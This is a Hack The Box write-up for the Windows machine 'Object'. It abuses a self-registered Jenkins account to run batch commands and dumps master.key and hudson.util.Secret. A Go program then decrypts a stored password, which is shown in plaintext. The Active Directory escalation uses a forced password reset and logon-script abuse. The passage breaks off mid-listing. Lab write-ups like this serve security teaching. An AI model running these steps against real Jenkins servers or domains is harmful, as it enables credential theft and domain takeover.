Hack The Box - Object

December 07, 2024

Object

Object is a Windows machine running Active Directory. Self-registration on a Jenkins instance yields an account that can create and configure jobs; although that account cannot click Build Now, a timer trigger or a remote-trigger token still runs the job, giving command execution as the account the Jenkins service runs under. From there the encrypted credentials in the Jenkins home directory can be read out and decrypted with master.key and hudson.util.Secret, yielding WinRM credentials for the user oliver. Once a shell is obtained, it is discovered that oliver is a domain user and the machine is a domain controller. Enumeration with BloodHound reveals that domain compromise can be achieved in three steps. First, oliver has ForceChangePassword over smith, enabling access as smith by resetting that user's password. Next, smith has GenericWrite over maria, enabling access as maria by setting her logon script. Finally, maria has WriteOwner over the Domain Admins group, allowing the user to take ownership of the group, grant herself rights on it, and then add herself as a member.

nmap scan:

┌──(kali㉿kali)-[~/Desktop/HTB/Object]
└─$ nmap -sC -sV -oA nmap/output 10.10.11.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-03 20:24 EST
Nmap scan report for object.htb (10.10.11.132)
Host is up (0.042s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Mega Engines
|_http-server-header: Microsoft-IIS/10.0
8080/tcp open  http    Jetty 9.4.43.v20210629
|_http-server-header: Jetty(9.4.43.v20210629)
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.00 seconds

I visited the webpage on port 80 which had a link to an automation server:

Mega Engines webpage

The link above redirected to object.htb:8080, so I added object.htb to /etc/hosts and visited the page which was a Jenkins instance:

Jenkins instance

I created an account and logged in:

log in to Jenkins

Attempting to access the script console at /script resulted in access denied:

Script Console access denied

On the Dashboard page, the user had access to create jobs:

Create a job

I created a job and selected Freestyle project:

Freestyle project

On the configuration page, the Build section had an Add build step dropdown with an Execute Windows batch command option:

Add build step

I tested this with the whoami command:

whoami command

After clicking Save there was no option to build. Typically the left column shows a Build Now link, but it was missing, which indicates that the self-registered account holds Job/Create and Job/Configure but not Job/Build:

test-project no build option

However, Job/Build is not the only way a job gets run; anyone who can configure a job can arrange for Jenkins itself to start it. Back on the configuration page, in the Build Triggers section, Build periodically schedules the job on a cron expression, and a timer-started build is not checked against the configuring user's permissions. For example, a five-field schedule of all asterisks would run it every minute:

build periodically

I saved the configuration, and after about a minute the build triggered. The Console Output showed the command running as oliver. Note that "Running as SYSTEM" refers to the Jenkins-internal SYSTEM authorization the build executes with, not a Windows account; the OS-level identity is what whoami prints, object\oliver, the account the Jenkins service runs as:

Started by timer
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project
[test-project] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins8835497066393974783.bat

C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>whoami
object\oliver

C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>exit 0 
Finished: SUCCESS

Another way to run the build is the remote trigger endpoint. On the configuration page I selected Trigger builds remotely (e.g., from scripts) and set an authentication token. This feature exists precisely so that scripts can start builds without holding Job/Build, so it sidesteps the missing Build Now link as well:

trigger builds remotely

To use the API, I needed to generate an API key, so I clicked the user icon in the top right of Jenkins and went to Configure. On the user configuration page, I selected Add new Token, then Generate, and copied the token:

API token

The Jenkins documentation here states that a build can be triggered with a POST request to the job's build endpoint. So I sent the following request, authenticating with my username and API token over HTTP basic auth and passing the job's trigger token as a query parameter:

┌──(kali㉿kali)-[~/Desktop/HTB/Object]
└─$ curl -u "test:112067325c86c2057a6e5d4c812bc4805e" -X POST "http://object.htb:8080/job/test-project/build?token=test_token"

After the build completed, I went to the console output which successfully ran the whoami command:

Started by remote host 10.10.14.55
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project
[test-project] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins2293941004648113126.bat

C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>whoami
object\oliver

C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>exit 0 
Finished: SUCCESS

Jenkins maps user IDs to their per-user directories in %JENKINS_HOME%\users\users.xml, and because Jenkins exports JENKINS_HOME into the build environment, cmd expands the variable for us. So back in the build configuration, I set the batch command to the following:

type %JENKINS_HOME%\users\users.xml

After triggering the build, users.xml was displayed in the console output:

Started by remote host 10.10.14.55
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project
[test-project] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins10023837392536135080.bat

C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>type C:\Users\oliver\AppData\Local\Jenkins\.jenkins\users\users.xml
<?xml version='1.1' encoding='UTF-8'?>
<hudson.model.UserIdMapper>
  <version>1</version>
  <idToDirectoryNameMap class="concurrent-hash-map">
    <entry>
      <string>test</string>
      <string>test_10072431638714946254</string>
    </entry>
    <entry>
      <string>admin</string>
      <string>admin_17207690984073220035</string>
    </entry>
  </idToDirectoryNameMap>
</hudson.model.UserIdMapper>
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>exit 0 
Finished: SUCCESS

With the ability to read files on the server, the stored credentials could be recovered offline using the Jenkins Credentials Decryptor tool, which can be found here. Jenkins encrypts stored secrets with a key that is itself stored, encrypted under master.key, in the Jenkins home directory, so three files are enough: the XML holding the encrypted value, master.key, and hudson.util.Secret (the credential key):

%JENKINS_HOME%/users/<user_directory_name>/config.xml
%JENKINS_HOME%/secrets/master.key
%JENKINS_HOME%/secrets/hudson.util.Secret

Credentials that a user stores in their own scope live in that user's config.xml rather than in the global credentials.xml. So based on users.xml, the admin user's config.xml would be:

%JENKINS_HOME%/users/admin_17207690984073220035/config.xml

I set the batch command to:

type %JENKINS_HOME%\users\admin_17207690984073220035\config.xml

Once the build completed, I went to the console output to reveal config.xml:

Started by remote host 10.10.14.55
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project
[test-project] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins17161737380000944563.bat

C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>type C:\Users\oliver\AppData\Local\Jenkins\.jenkins\users\admin_17207690984073220035\config.xml
<?xml version='1.1' encoding='UTF-8'?>
<user>
  <version>10</version>
  <id>admin</id>
  <fullName>admin</fullName>
  <properties>
    <com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@2.6.1">
      <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
        <entry>
          <com.cloudbees.plugins.credentials.domains.Domain>
            <specifications/>
          </com.cloudbees.plugins.credentials.domains.Domain>
          <java.util.concurrent.CopyOnWriteArrayList>
            <com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
              <id>320a60b9-1e5c-4399-8afe-44466c9cde9e</id>
              <description></description>
              <username>oliver</username>
              <password>{AQAAABAAAAAQqU+m+mC6ZnLa0+yaanj2eBSbTk+h4P5omjKdwV17vcA=}</password>
              <usernameSecret>false</usernameSecret>
            </com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
          </java.util.concurrent.CopyOnWriteArrayList>
        </entry>
      </domainCredentialsMap>
    </com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>
    <hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty plugin="email-ext@2.84">
      <triggers/>
    </hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty>
    <hudson.model.MyViewsProperty>
      <views>
        <hudson.model.AllView>
          <owner class="hudson.model.MyViewsProperty" reference="../../.."/>
          <name>all</name>
          <filterExecutors>false</filterExecutors>
          <filterQueue>false</filterQueue>
          <properties class="hudson.model.View$PropertyList"/>
        </hudson.model.AllView>
      </views>
    </hudson.model.MyViewsProperty>
    <org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.3.5">
      <providerId>default</providerId>
    </org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>
    <hudson.model.PaneStatusProperties>
      <collapsed/>
    </hudson.model.PaneStatusProperties>
    <jenkins.security.seed.UserSeedProperty>
      <seed>ea75b5bd80e4763e</seed>
    </jenkins.security.seed.UserSeedProperty>
    <hudson.search.UserSearchProperty>
      <insensitiveSearch>true</insensitiveSearch>
    </hudson.search.UserSearchProperty>
    <hudson.model.TimeZoneProperty/>
    <hudson.security.HudsonPrivateSecurityRealm_-Details>
      <passwordHash>#jbcrypt:$2a$10$q17aCNxgciQt8S246U4ZauOccOY7wlkDih9b/0j4IVjZsdjUNAPoW</passwordHash>
    </hudson.security.HudsonPrivateSecurityRealm_-Details>
    <hudson.tasks.Mailer_-UserProperty plugin="mailer@1.34">
      <emailAddress>admin@object.local</emailAddress>
    </hudson.tasks.Mailer_-UserProperty>
    <jenkins.security.ApiTokenProperty>
      <tokenStore>
        <tokenList/>
      </tokenStore>
    </jenkins.security.ApiTokenProperty>
    <jenkins.security.LastGrantedAuthoritiesProperty>
      <roles>
        <string>authenticated</string>
      </roles>
      <timestamp>1634793332195</timestamp>
    </jenkins.security.LastGrantedAuthoritiesProperty>
  </properties>
</user>
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>exit 0 
Finished: SUCCESS

To read master.key, I set the batch command to:

type %JENKINS_HOME%\secrets\master.key

Console output:

Started by remote host 10.10.14.55
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project
[test-project] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins8435746844721434956.bat

C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>type C:\Users\oliver\AppData\Local\Jenkins\.jenkins\secrets\master.key 
f673fdb0c4fcc339070435bdbe1a039d83a597bf21eafbb7f9b35b50fce006e564cff456553ed73cb1fa568b68b310addc576f1637a7fe73414a4c6ff10b4e23adc538e9b369a0c6de8fc299dfa2a3904ec73a24aa48550b276be51f9165679595b2cac03cc2044f3c702d677169e2f4d3bd96d8321a2e19e2bf0c76fe31db19
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>exit 0 
Finished: SUCCESS

To read hudson.util.Secret, I set the batch command to:

type %JENKINS_HOME%\secrets\hudson.util.Secret

Console output:

Started by remote host 10.10.14.55
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project
[test-project] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins6004140155461822663.bat

C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>type C:\Users\oliver\AppData\Local\Jenkins\.jenkins\secrets\hudson.util.Secret
�aPTñ‹ìQw3訾®Ã€ƒg·¢dw-J)
uM†’,Ábˆn¨
\îÙ!Ë÷s¢E¹Ä1âªaí;>©×õU‹‡¾Õµÿ™Þ8	îƽ¿xd$³ÌYU
©k1Α}ôAö»Ýv–…í„�¬©•
`K� 8
D�aIâXÒD-Å"´¾¯í‹äGt\ñQå_]Æš”�Ç>J/©«ÎL('ÞìU§ �JÌ“á­|R´7Šè=vP7ˆ:ˆDÕ{ºKI8²Äžû!U�ק“úêXÊ P¿fŠáE4ìLܤ^ˆöð‡*áËù‚ZˆuÒ®tdÊ„! 7zßQ"
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>exit 0 
Finished: SUCCESS

Since hudson.util.Secret is a binary file, it cannot be copied reliably from the console output, so I had the build base64-encode it instead. (The -Encoding byte switch is Windows PowerShell 5.1 syntax; on PowerShell 7 the equivalent is -AsByteStream.) I set the batch command to:

powershell -c [convert]::ToBase64String((cat %JENKINS_HOME%\secrets\hudson.util.Secret -Encoding byte))

Then, it was outputted as base64:

Started by remote host 10.10.14.55
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project
[test-project] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins16252520389882112308.bat

C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>powershell -c [convert]::ToBase64String((cat C:\Users\oliver\AppData\Local\Jenkins\.jenkins\secrets\hudson.util.Secret -Encoding byte))  
gWFQFlTxi+xRdwcz6KgADwG+rsOAg2e3omR3LUopDXUcTQaGCJIswWKIbqgNXAvu2SHL93OiRbnEMeKqYe07PqnX9VWLh77Vtf+Z3jgJ7sa9v3hkJLPMWVUKqWsaMRHOkX30Qfa73XaWhe0ShIGsqROVDA1gS50ToDgNRIEXYRQWSeJY0gZELcUFIrS+r+2LAORHdFzxUeVfXcaalJ3HBhI+Si+pq85MKCcY3uxVpxSgnUrMB5MX4a18UrQ3iug9GHZQN4g6iETVf3u6FBFLSTiyxJ77IVWB1xgep5P66lgfEsqgUL9miuFFBzTsAkzcpBZeiPbwhyrhy/mCWogCddKudAJkHMqEISA3et9RIgA=

C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>exit 0 
Finished: SUCCESS

I copied the string and base64 decoded it into a file:

┌──(kali㉿kali)-[~/Desktop/HTB/Object]
└─$ echo "gWFQFlTxi+xRdwcz6KgADwG+rsOAg2e3omR3LUopDXUcTQaGCJIswWKIbqgNXAvu2SHL93OiRbnEMeKqYe07PqnX9VWLh77Vtf+Z3jgJ7sa9v3hkJLPMWVUKqWsaMRHOkX30Qfa73XaWhe0ShIGsqROVDA1gS50ToDgNRIEXYRQWSeJY0gZELcUFIrS+r+2LAORHdFzxUeVfXcaalJ3HBhI+Si+pq85MKCcY3uxVpxSgnUrMB5MX4a18UrQ3iug9GHZQN4g6iETVf3u6FBFLSTiyxJ77IVWB1xgep5P66lgfEsqgUL9miuFFBzTsAkzcpBZeiPbwhyrhy/mCWogCddKudAJkHMqEISA3et9RIgA=" | base64 -d > hudson.util.Secret

After saving config.xml, master.key, and hudson.util.Secret locally, I used Jenkins Credentials Decryptor to obtain the credentials for the user oliver:

┌──(kali㉿kali)-[~/Desktop/HTB/Object]
└─$ chmod +x jenkins-credentials-decryptor

┌──(kali㉿kali)-[~/Desktop/HTB/Object]
└─$ ./jenkins-credentials-decryptor
Please provide all required flags.

Usage:

  jenkins-credentials-decryptor \
    -m master.key \
    -s hudson.util.Secret \
    -c credentials.xml \
    -o json

Flags:

  -c string
        (required) credentials.xml file location
  -m string
        (required) master.key file location
  -o string
        (optional) output format [json|text] (default "json")
  -s string
        (required) hudson.util.Secret file location
  -version
        (optional) show version

┌──(kali㉿kali)-[~/Desktop/HTB/Object]
└─$ ./jenkins-credentials-decryptor -c config.xml -m master.key -s hudson.util.Secret
[
  {
    "id": "320a60b9-1e5c-4399-8afe-44466c9cde9e",
    "password": "c1cdfun_d2434",
    "username": "oliver"
  }
]
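What the decryptor does under the hood, as an added Go example (my code, not the jenkins-credentials-decryptor tool and not Jenkins' own source): master.key is hashed with SHA-256 and the first 16 bytes become an AES key; that key decrypts hudson.util.Secret in ECB mode and the result must end in the ::::MAGIC:::: trailer; the first 16 bytes of that payload are the real credential key; and each {...} value in config.xml is a versioned blob of IV plus AES-128-CBC ciphertext under that key. The constants embed the master.key text, the hudson.util.Secret base64 and the encrypted <password> captured above; function and constant names are mine. Save it as main.go and run go run main.go.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/sha256"
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
	"strings"
)

// Trailer Jenkins appends to everything it encrypts under master.key, so a wrong key fails loudly.
const magic = "::::MAGIC::::"

// Values read off the box above: master.key text, hudson.util.Secret base64, admin's config.xml <password>.
const (
	pageMasterKey    = "f673fdb0c4fcc339070435bdbe1a039d83a597bf21eafbb7f9b35b50fce006e564cff456553ed73cb1fa568b68b310addc576f1637a7fe73414a4c6ff10b4e23adc538e9b369a0c6de8fc299dfa2a3904ec73a24aa48550b276be51f9165679595b2cac03cc2044f3c702d677169e2f4d3bd96d8321a2e19e2bf0c76fe31db19"
	pageHudsonSecret = "gWFQFlTxi+xRdwcz6KgADwG+rsOAg2e3omR3LUopDXUcTQaGCJIswWKIbqgNXAvu2SHL93OiRbnEMeKqYe07PqnX9VWLh77Vtf+Z3jgJ7sa9v3hkJLPMWVUKqWsaMRHOkX30Qfa73XaWhe0ShIGsqROVDA1gS50ToDgNRIEXYRQWSeJY0gZELcUFIrS+r+2LAORHdFzxUeVfXcaalJ3HBhI+Si+pq85MKCcY3uxVpxSgnUrMB5MX4a18UrQ3iug9GHZQN4g6iETVf3u6FBFLSTiyxJ77IVWB1xgep5P66lgfEsqgUL9miuFFBzTsAkzcpBZeiPbwhyrhy/mCWogCddKudAJkHMqEISA3et9RIgA="
	pageOliverSecret = "{AQAAABAAAAAQqU+m+mC6ZnLa0+yaanj2eBSbTk+h4P5omjKdwV17vcA=}"
)

// pkcs7Unpad strips the padding that Java's "PKCS5Padding" ciphers add.
func pkcs7Unpad(b []byte) ([]byte, error) {
	n := 0
	if len(b) > 0 {
		n = int(b[len(b)-1])
	}
	if n == 0 || n > aes.BlockSize || n > len(b) || !bytes.Equal(b[len(b)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad padding (wrong key?)")
	}
	return b[:len(b)-n], nil
}

// aesECBDecrypt is Java's Cipher.getInstance("AES") default, AES/ECB/PKCS5Padding (reproduced, not endorsed).
func aesECBDecrypt(key, in []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil || len(in)%aes.BlockSize != 0 {
		return nil, errors.New("bad key length or unaligned ciphertext")
	}
	out := make([]byte, len(in))
	for i := 0; i < len(in); i += aes.BlockSize {
		block.Decrypt(out[i:], in[i:i+aes.BlockSize])
	}
	return pkcs7Unpad(out)
}

// unwrapHudsonSecret: the master AES key is the first 16 bytes of SHA-256 over the trimmed *text* of
// master.key (hudson.Util.toAes128Key). It decrypts hudson.util.Secret, whose plaintext must end in MAGIC;
// the first 16 bytes of that plaintext are the key Jenkins uses for credentials (CryptoConfidentialKey).
func unwrapHudsonSecret(masterKey string, hudsonSecret []byte) ([]byte, error) {
	sum := sha256.Sum256([]byte(strings.TrimSpace(masterKey)))
	plain, err := aesECBDecrypt(sum[:16], hudsonSecret)
	if err != nil || len(plain) < aes.BlockSize+len(magic) || !bytes.HasSuffix(plain, []byte(magic)) {
		return nil, errors.New("MAGIC trailer missing: wrong master.key or corrupt hudson.util.Secret")
	}
	return plain[:aes.BlockSize], nil
}

// decryptCredential decodes the {base64} v1 form: 0x01 | iv len (BE32) | data len (BE32) | iv | AES-128-CBC.
// Brace-less values are the older AES-ECB + MAGIC form and are rejected here.
func decryptCredential(key []byte, encoded string) (string, error) {
	b64 := strings.TrimSuffix(strings.TrimPrefix(strings.TrimSpace(encoded), "{"), "}")
	p, err := base64.StdEncoding.DecodeString(b64)
	if err != nil || len(p) < 9 || p[0] != 1 {
		return "", errors.New("undecodable or non-v1 payload")
	}
	ivLen, dataLen := int(binary.BigEndian.Uint32(p[1:5])), int(binary.BigEndian.Uint32(p[5:9]))
	if len(key) != 16 || ivLen != aes.BlockSize || dataLen <= 0 || dataLen%aes.BlockSize != 0 || len(p) != 9+ivLen+dataLen {
		return "", errors.New("malformed v1 payload or wrong key size")
	}
	block, _ := aes.NewCipher(key) // cannot fail: key length checked above
	out := make([]byte, dataLen)
	cipher.NewCBCDecrypter(block, p[9:9+ivLen]).CryptBlocks(out, p[9+ivLen:])
	out, err = pkcs7Unpad(out)
	return string(out), err
}

// decryptOliver runs the chain over the captured values; master.key is a parameter so a wrong one can be shown to fail.
func decryptOliver(masterKey string) (string, error) {
	hudson, _ := base64.StdEncoding.DecodeString(pageHudsonSecret) // constant input; a bad decode fails the MAGIC check below
	key, err := unwrapHudsonSecret(masterKey, hudson)
	if err != nil {
		return "", err
	}
	return decryptCredential(key, pageOliverSecret)
}

func main() {
	pw, err := decryptOliver(pageMasterKey)
	if err != nil {
		panic(err)
	}
	fmt.Println("oliver:", pw)
}
```

The MAGIC check is the practical part: with the wrong master.key the ECB layer decrypts to noise and unwrapHudsonSecret errors out instead of handing back a bogus credential key, which is how a mangled hudson.util.Secret (for instance one pasted from raw console output rather than base64) is told apart from a good one.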

Since this was a Windows machine, I checked these credentials against WinRM. netexec confirmed that these credentials were valid:

┌──(kali㉿kali)-[~/Desktop/HTB/Object]
└─$ netexec winrm 10.10.11.132 -u 'oliver' -p 'c1cdfun_d2434' 
WINRM       10.10.11.132    5985   JENKINS          [*] Windows 10 / Server 2019 Build 17763 (name:JENKINS) (domain:object.local)
WINRM       10.10.11.132    5985   JENKINS          [+] object.local\oliver:c1cdfun_d2434 (Pwn3d!)

evil-winrm shell as oliver:

┌──(kali㉿kali)-[~/Desktop/HTB/Object]
└─$ evil-winrm -i 10.10.11.132 -u 'oliver' -p 'c1cdfun_d2434'
                                        
Evil-WinRM shell v3.5
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\oliver\Documents> whoami
object\oliver
*Evil-WinRM* PS C:\Users\oliver\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\oliver\desktop> ls


    Directory: C:\Users\oliver\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        12/3/2024   5:23 PM             34 user.txt

Enumeration revealed that the user was part of an AD domain (whoami already returned the OBJECT domain and netexec reported object.local), and the listening ports identified the machine as a domain controller: 88 (Kerberos), 389/636 (LDAP/LDAPS), 3268/3269 (global catalog), 464 (kpasswd), 53 (DNS) and 9389 (AD Web Services):

*Evil-WinRM* PS C:\Users\oliver\desktop> netstat -an | findstr LISTEN
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49673          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49674          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49684          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49695          0.0.0.0:0              LISTENING
  TCP    10.10.11.132:53        0.0.0.0:0              LISTENING
  TCP    10.10.11.132:139       0.0.0.0:0              LISTENING
  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING
<...snip...>

To collect domain data, I uploaded SharpHound.exe, but it didn't run. Next, I tried SharpHound.ps1, which loads the same collector in memory and exposes it as Invoke-BloodHound, and that worked:

*Evil-WinRM* PS C:\programdata> upload SharpHound.ps1

Info: Uploading /home/kali/Desktop/HTB/Object/SharpHound.ps1 to C:\programdata\SharpHound.ps1

Data: 1744464 bytes of 1744464 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\programdata> . .\SharpHound.ps1
*Evil-WinRM* PS C:\programdata> Invoke-BloodHound -CollectionMethods All -OutputDirectory C:\programdata
*Evil-WinRM* PS C:\programdata> ls


    Directory: C:\programdata


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d---s-       10/21/2021   3:13 AM                Microsoft
d-----       10/21/2021  12:05 AM                regid.1991-06.com.microsoft
d-----        9/15/2018  12:19 AM                SoftwareDistribution
d-----        4/10/2020   5:48 AM                ssh
d-----        4/10/2020  10:49 AM                USOPrivate
d-----        4/10/2020  10:49 AM                USOShared
d-----        8/25/2021   2:57 AM                VMware
-a----        12/3/2024   6:52 PM          11443 20241203185242_BloodHound.zip
-a----        12/3/2024   6:52 PM           7897 MWU2MmE0MDctMjBkZi00N2VjLTliOTMtYThjYTY4MjdhZDA2.bin
-a----        12/3/2024   6:49 PM         578048 SharpHound.exe
-a----        12/3/2024   6:51 PM        1308348 SharpHound.ps1

I downloaded the ZIP:

*Evil-WinRM* PS C:\programdata> download 20241203185242_BloodHound.zip

Info: Downloading C:\programdata\20241203185242_BloodHound.zip to 20241203185242_BloodHound.zip

Info: Download successful!

After uploading the data into BloodHound, viewing First Degree Object Control for oliver showed that the user had ForceChangePassword rights over smith:

Oliver First Degree Object Control

First Degree Object Control for smith showed GenericWrite access over maria:

Smith First Degree Object Control

First Degree Object Control for maria showed WriteOwner access over the Domain Admins group:

Maria First Degree Object Control

Therefore, domain admin could be achieved in three jumps. So next, I uploaded PowerView into the WinRM session:

*Evil-WinRM* PS C:\programdata> upload PowerView.ps1

Info: Uploading /home/kali/Desktop/HTB/Object/PowerView.ps1 to C:\programdata\PowerView.ps1

Data: 1206372 bytes of 1206372 bytes copied

Info: Upload successful!

ForceChangePassword is the User-Force-Change-Password extended right, so smith's password can be reset without knowing the current one. Using Set-DomainUserPassword from PowerView, I changed the password of smith (note that this is a destructive, user-visible change, since smith's old password stops working):

*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1
*Evil-WinRM* PS C:\programdata> $password = ConvertTo-SecureString 'P@ssw0rd' -AsPlainText -Force
*Evil-WinRM* PS C:\programdata> Set-DomainUserPassword -Identity smith -AccountPassword $password

I was then able to log in as smith over WinRM:

┌──(kali㉿kali)-[~/Desktop/HTB/Object]
└─$ evil-winrm -i 10.10.11.132 -u 'smith' -p 'P@ssw0rd'
                                        
Evil-WinRM shell v3.5
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\smith\Documents> whoami
object\smith

Since smith had GenericWrite over maria, I first attempted targeted Kerberoasting (using the write access to put an SPN on maria, requesting a service ticket for it and cracking the ticket offline), but the password didn't crack. However, as mentioned here, GenericWrite also covers the scriptPath attribute, the logon script that runs in the user's own security context at their next interactive logon. Thus, I created a PowerShell script (run.ps1) containing a command to output the results of ls c:\users\maria into c:\programdata\output:

*Evil-WinRM* PS C:\programdata> echo "ls c:\users\maria > c:\programdata\output" > run.ps1

Then, using PowerView, I set maria's scriptPath to c:\programdata\run.ps1. Nothing happens until maria actually logs on; on this box a logon is evidently simulated, because the script ran shortly afterwards without any action on my part:

*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1
*Evil-WinRM* PS C:\programdata> Set-DomainObject -Identity maria -SET @{scriptpath="c:\programdata\run.ps1"}

Once maria's logon had run the script in her context, output appeared in c:\programdata:

*Evil-WinRM* PS C:\programdata> ls


    Directory: C:\programdata


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d---s-       10/21/2021   3:13 AM                Microsoft
d-----       10/21/2021  12:05 AM                regid.1991-06.com.microsoft
d-----        9/15/2018  12:19 AM                SoftwareDistribution
d-----        4/10/2020   5:48 AM                ssh
d-----        4/10/2020  10:49 AM                USOPrivate
d-----        4/10/2020  10:49 AM                USOShared
d-----        8/25/2021   2:57 AM                VMware
-a----        12/3/2024   6:52 PM          11443 20241203185242_BloodHound.zip
-a----        12/3/2024   6:52 PM           7897 MWU2MmE0MDctMjBkZi00N2VjLTliOTMtYThjYTY4MjdhZDA2.bin
-a----        12/3/2024   7:04 PM           3476 output
-a----        12/3/2024   7:00 PM         904779 PowerView.ps1
-a----        12/3/2024   7:04 PM             88 run.ps1
-a----        12/3/2024   6:49 PM         578048 SharpHound.exe
-a----        12/3/2024   6:51 PM        1308348 SharpHound.ps1

I was able to enumerate the user directory for maria by reading output:

*Evil-WinRM* PS C:\programdata> cat output


    Directory: C:\users\maria


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---       10/22/2021   3:54 AM                3D Objects
d-r---       10/22/2021   3:54 AM                Contacts
d-r---       10/25/2021   3:47 AM                Desktop
d-r---       10/25/2021  10:07 PM                Documents
d-r---       10/22/2021   3:54 AM                Downloads
d-r---       10/22/2021   3:54 AM                Favorites
d-r---       10/22/2021   3:54 AM                Links
d-r---       10/22/2021   3:54 AM                Music
d-r---       10/22/2021   3:54 AM                Pictures
d-r---       10/22/2021   3:54 AM                Saved Games
d-r---       10/22/2021   3:54 AM                Searches
d-r---       10/22/2021   3:54 AM                Videos

Next, I edited run.ps1 to list the contents of c:\users\maria\desktop:

*Evil-WinRM* PS C:\programdata> echo "ls c:\users\maria\desktop > c:\programdata\output" > run.ps1
*Evil-WinRM* PS C:\programdata> ls


    Directory: C:\programdata


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d---s-       10/21/2021   3:13 AM                Microsoft
d-----       10/21/2021  12:05 AM                regid.1991-06.com.microsoft
d-----        9/15/2018  12:19 AM                SoftwareDistribution
d-----        4/10/2020   5:48 AM                ssh
d-----        4/10/2020  10:49 AM                USOPrivate
d-----        4/10/2020  10:49 AM                USOShared
d-----        8/25/2021   2:57 AM                VMware
-a----        12/3/2024   6:52 PM          11443 20241203185242_BloodHound.zip
